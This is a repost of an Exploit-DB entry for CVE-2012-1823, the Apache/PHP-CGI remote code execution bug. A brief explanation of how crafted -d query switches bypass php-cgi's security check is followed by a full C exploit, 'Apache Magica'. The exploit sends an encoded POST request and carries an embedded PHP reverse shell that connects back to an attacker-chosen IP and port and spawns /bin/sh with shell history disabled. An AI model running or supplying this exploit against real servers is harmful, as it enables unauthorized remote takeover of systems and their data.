A repost of http://www.exploit-db.com/exploits/29290/.

Apache / PHP 5.x Remote Code Execution Exploit


  • EDB-ID: 29290
  • CVE: 2012-1823
  • OSVDB-ID: N/A
  • Author: Kingcope
  • Published: 2013-10-29
  • Verified: Not Verified
  • Exploit Code: Download
  • Vulnerable App: N/A

Rating

Overall: (0.0)

This is a code execution bug in the combination of Apache and PHP.

> /* Apache Magica by Kingcope */
> /* gcc apache-magika.c -o apache-magika -lssl */
> /* This is a code execution bug in the combination of Apache and PHP.
> On Debian and Ubuntu the vulnerability is present in the default install
> of the php5-cgi package. When the php5-cgi package is installed on Debian and
> Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under
> /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute
> the binary because this binary has a security check enabled when installed with
> Apache http server and this security check is circumvented by the exploit.
> When accessing the php-cgi binary the security check will block the request and
> will not execute the binary.
> In the source code file sapi/cgi/cgi_main.c of PHP we can see that the security
> check is done when the php.ini configuration setting cgi.force_redirect is set
> and the php.ini configuration setting cgi.redirect_status_env is set to no.
> This makes it possible to execute the binary bypassing the Security check by
> setting these two php.ini settings.
> Prior to this code for the Security check getopt is called and it is possible
> to set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the
> -d switch. If both values are set to zero and the request is sent to the server
> php-cgi gets fully executed and we can use the payload in the POST data field
> to execute arbitrary php and therefore we can execute programs on the system.
> apache-magika.c is an exploit that does exactly the prior described. It does
> support SSL.
> /* Affected and tested versions
> PHP 5.3.10
> PHP 5.3.8-1
> PHP 5.3.6-13
> PHP 5.3.3
> PHP 5.2.17
> PHP 5.2.11
> PHP 5.2.6-3
> PHP 5.2.6+lenny16 with Suhosin-Patch
> Affected versions
> PHP prior to 5.3.12
> PHP prior to 5.4.2
> Unaffected versions
> PHP 4 - getopt parser unexploitable
> PHP 5.3.12 and up
> PHP 5.4.2 and up
> Unaffected versions are patched by CVE-2012-1823.
> */

> /* .
> /'\rrq rk
> . // \\ .
> .x.//fco\\-|-
> '//cmtco\\zt
> //6meqrg.\\tq
> //_________\\'
> EJPGQO
> apache-magica.c by Kingcope
> */

>
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
> #include <getopt.h>
> #include <sys/types.h>
> #include <stddef.h>
> #include <openssl/rand.h>
> #include <openssl/ssl.h>
> #include <openssl/err.h>
> #include <netdb.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
>
> typedef struct {
> int sockfd;
> SSL *handle;
> SSL_CTX *ctx;
> } connection;
>
> void usage(char *argv[])
> {
> printf("usage: %s <--target target> <--port port> <--protocol http|https> "
> "<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\n",
> argv[0]);
> exit(1);
> }
>
> char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"
> "%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64"
> "+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73"
> "%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E"
> "%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63"
> "%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62"
> "%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74"
> "%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68"
> "%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F"
> "%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63"
> "%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73"
> "%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n"
> "Host: %s\r\n"
> "User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26"
> "(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n"
> "Content-Type: application/x-www-form-urlencoded\r\n"
> "Content-Length: %d\r\n"
> "Connection: close\r\n\r\n%s";
> char phpstr[] = "<?php\n"
> "set_time_limit(0);\n"
> "$ip = '%s';\n"
> "$port = %d;\n"
> "$chunk_size = 1400;\n"
> "$write_a = null;\n"
> "$error_a = null;\n"
> "$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\n"
> "$daemon = 0;\n"
> "$debug = 0;\n"
> "if (function_exists('pcntl_fork')) {\n"
> " $pid = pcntl_fork(); \n"
> " if ($pid == -1) {\n"
> " printit(\"ERROR: Can't fork\");\n"
> " exit(1);\n"
> " }\n"
> " if ($pid) {\n"
> " exit(0);\n"
> " }\n"
> " if (posix_setsid() == -1) {\n"
> " printit(\"Error: Can't setsid()\");\n"
> " exit(1);\n"
> " }\n"
> " $daemon = 1;\n"
> "} else {\n"
> " printit(\"WARNING: Failed to daemonise.\");\n"
> "}\n"
> "chdir(\"/\");\n"
> "umask(0);\n"
> "$sock = fsockopen($ip, $port, $errno, $errstr, 30);\n"
> "if (!$sock) {\n"
> " printit(\"$errstr ($errno)\");\n"
> " exit(1);\n"
> "}\n"
> "$descriptorspec = array(\n"
> " 0 => array(\"pipe\", \"r\"),\n"
> " 1 => array(\"pipe\", \"w\"),\n"
> " 2 => array(\"pipe\", \"w\")\n"
> ");\n"
> "$process = proc_open($shell, $descriptorspec, $pipes);\n"
> "if (!is_resource($process)) {\n"
> " printit(\"ERROR: Can't spawn shell\");\n"
> " exit(1);\n"
> "}\n"
> "stream_set_blocking($pipes[0], 0);\n"
> "stream_set_blocking($pipes[1], 0);\n"
> "stream_set_blocking($pipes[2], 0);\n"
> "stream_set_blocking($sock, 0);\n"
> "while (1) {\n"
> " if (feof($sock)) {\n"
> " printit(\"ERROR: Shell connection terminated\");\n"
> " break;\n"
> " }\n"
> " if (feof($pipes[1])) {\n"
> " printit(\"ERROR: Shell process terminated\");\n"
> " break;\n"
> " }\n"
> " $read_a = array($sock, $pipes[1], $pipes[2]);\n"
> " $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n"
> " if (in_array($sock, $read_a)) {\n"
> " if ($debug) printit(\"SOCK READ\");\n"
> " $input = fread($sock, $chunk_size);\n"
> " if ($debug) printit(\"SOCK: $input\");\n"
> " fwrite($pipes[0], $input);\n"
> " }\n"
> " if (in_array($pipes[1], $read_a)) {\n"
> " if ($debug) printit(\"STDOUT READ\");\n"
> " $input = fread($pipes[1], $chunk_size);\n"
> " if ($debug) printit(\"STDOUT: $input\");\n"
> " fwrite($sock, $input);\n"
> " }\n"
> " if (in_array($pipes[2], $read_a)) {\n"
> " if ($debug) printit(\"STDERR READ\");\n"
> " $input = fread($pipes[2], $chunk_size);\n"
> " if ($debug) printit(\"STDERR: $input\");\n"
> " fwrite($sock, $input);\n"
> " }\n"
> "}\n"
> "\n"
> "fclose($sock);\n"
> "fclose($pipes[0]);\n"
> "fclose($pipes[1]);\n"
> "fclose($pipes[2]);\n"
> "proc_close($process);\n"
> "function printit ($string) {\n"
> " if (!$daemon) {\n"
> " print \"$string\n\";\n"
> " }\n"
> "}\n"
> "exit(1);\n"
> "?>";
>
> struct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)
> {
> struct hostent *he;
> struct sockaddr_in server, *servercopy;
>
> if ((he=gethostbyname(hostname)) == NULL) {
> printf("Hostname cannot be resolved\n");
> exit(255);
> }
>
> servercopy = malloc(sizeof(struct sockaddr_in));
> if (!servercopy) {
> printf("malloc error (1)\n");
> exit(255);
> }
> memset(&server, '\0', sizeof(struct sockaddr_in));
> memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);
> server.sin_family = AF_INET;
> server.sin_port = htons(port);
> memcpy(servercopy, &server, sizeof(struct sockaddr_in));
> return servercopy;
> }
>
> char *sslread(connection *c)
> {
> char *rc = NULL;
> int received, count = 0, count2=0;
> char ch;
>
> for(;;)
> {
> if (!rc)
> rc = calloc(1024, sizeof (char) + 1);
> else
> if (count2 % 1024 == 0) {
> rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
> }
> received = SSL_read(c->handle, &ch, 1);
> if (received == 1) {
> rc[count++] = ch;
> count2++;
> if (count2 > 1024*5)
> break;
> }
> else
> break;
> }
> return rc;
> }
>
> char *read_(int sockfd)
> {
> char *rc = NULL;
> int received, count = 0, count2=0;
> char ch;
>
> for(;;)
> {
> if (!rc)
> rc = calloc(1024, sizeof (char) + 1);
> else
> if (count2 % 1024 == 0) {
> rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);
> }
> received = read(sockfd, &ch, 1);
> if (received == 1) {
> rc[count++] = ch;
> count2++;
> if (count2 > 1024*5)
> break;
> }
> else
> break;
> }
> return rc;
> }
>
> void main(int argc, char *argv[])
> {
> char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,
> *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;
> char httpsflag=0;
> unsigned short port=0, reverseport=0;
> struct sockaddr_in *server;
> int sockfd;
> unsigned int writesize, tmpsize;
> unsigned int i;
> connection *sslconnection;
> printf("-== Apache Magika by Kingcope ==-\n");
> for(;;)
> {
> int c;
> int option_index=0;
> static struct option long_options[] = {
> {"target", required_argument, 0, 0 },
> {"port", required_argument, 0, 0 },
> {"protocol", required_argument, 0, 0 },
> {"reverse-ip", required_argument, 0, 0 },
> {"reverse-port", required_argument, 0, 0 },
> {"force-interpreter", required_argument, 0, 0 },
> {0, 0, 0, 0 }
> };
>
> c = getopt_long(argc, argv, "", long_options, &option_index);
> if (c < 0)
> break;
>
> switch (c) {
> case 0:
> switch (option_index) {
> case 0:
> if (optarg) {
> target = calloc(strlen(optarg)+1, sizeof(char));
> if (!target) {
> printf("calloc error (2)\n");
> exit(255);
> }
> memcpy(target, optarg, strlen(optarg)+1);
> }
> break;
> case 1:
> if(optarg)
> port = atoi(optarg);
> break;
> case 2:
> protocol = calloc(strlen(optarg)+1, sizeof(char));
> if (!protocol) {
> printf("calloc error (3)\n");
> exit(255);
> }
> memcpy(protocol, optarg, strlen(optarg)+1);
> if (!strcmp(protocol, "https"))
> httpsflag=1;
> break;
> case 3:
> reverseip = calloc(strlen(optarg)+1, sizeof(char));
> if (!reverseip) {
> printf("calloc error (4)\n");
> exit(255);
> }
> memcpy(reverseip, optarg, strlen(optarg)+1);
> break;
> case 4:
> reverseport = atoi(optarg);
> reverseportstr = calloc(strlen(optarg)+1, sizeof(char));
> if (!reverseportstr) {
> printf("calloc error (5)\n");
> exit(255);
> }
> memcpy(reverseportstr, optarg, strlen(optarg)+1);
> break;
> case 5:
> forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));
> if (!forceinterpreter) {
> printf("calloc error (6)\n");
> exit(255);
> }
> memcpy(forceinterpreter, optarg, strlen(optarg)+1);
> break;
> default:
> usage(argv);
> }
> break;
>
> default:
> usage(argv);
> }
> }
>
> if ((optind < argc) || !target || !protocol || !port ||
> !reverseip || !reverseport){
> usage(argv);
> }
>
> server = gethostbyname_(target, port);
> if (!server) {
> printf("Error while resolving hostname. (7)\n");
> exit(255);
> }
>
> char *interpreters[5];
> int ninterpreters = 5;
> interpreters[0] = strdup("/cgi-bin/php");
> interpreters[1] = strdup("/cgi-bin/php5");
> interpreters[2] = strdup("/cgi-bin/php-cgi");
> interpreters[3] = strdup("/cgi-bin/php.cgi");
> interpreters[4] = strdup("/cgi-bin/php4");
>
> for (i=0;i<ninterpreters;i++) {
> interpreter = interpreters[i];
> if (forceinterpreter) {
> interpreter = strdup(forceinterpreter);
> }
> if (forceinterpreter && i)
> break;
> printf("%s\n", interpreter);
>
> sockfd = socket(AF_INET, SOCK_STREAM, 0);
> if (sockfd < 1) {
> printf("socket error (8)\n");
> exit(255);
> }
>
> if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {
> printf("connect error (9)\n");
> exit(255);
> }
> if (httpsflag) {
> sslconnection = (connection*) malloc(sizeof(connection));
> if (!sslconnection) {
> printf("malloc error (10)\n");
> exit(255);
> }
> sslconnection->handle = NULL;
> sslconnection->ctx = NULL;
>
> SSL_library_init();
>
> sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());
> if (!sslconnection->ctx) {
> printf("SSL_CTX_new error (11)\n");
> exit(255);
> }
>
> sslconnection->handle = SSL_new(sslconnection->ctx);
> if (!sslconnection->handle) {
> printf("SSL_new error (12)\n");
> exit(255);
> }
> if (!SSL_set_fd(sslconnection->handle, sockfd)) {
> printf("SSL_set_fd error (13)\n");
> exit(255);
> }
>
> if (SSL_connect(sslconnection->handle) != 1) {
> printf("SSL_connect error (14)\n");
> exit(255);
> }
> }
>
> tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;
> tmpstr = (char*)calloc(tmpsize, sizeof(char));
> snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);
>
> writesize = strlen(target) + strlen(interpreter) +
> strlen(poststr) + strlen(tmpstr) + 64;
> writestr = (char*)calloc(writesize, sizeof(char));
> snprintf(writestr, writesize, poststr, interpreter,
> target, strlen(tmpstr), tmpstr);
>
> if (!httpsflag) {
> write(sockfd, writestr, strlen(writestr));
> readbuf = read_(sockfd);
> } else {
> SSL_write(sslconnection->handle, writestr, strlen(writestr));
> readbuf = sslread(sslconnection);
> }
>
> if (readbuf) {
> printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf);
> } else {
> printf("read error (15)\n");
> exit(255);
> }
> }
> exit(1);
> }
>

Source: http://www.exploit-db.com/exploits/29290/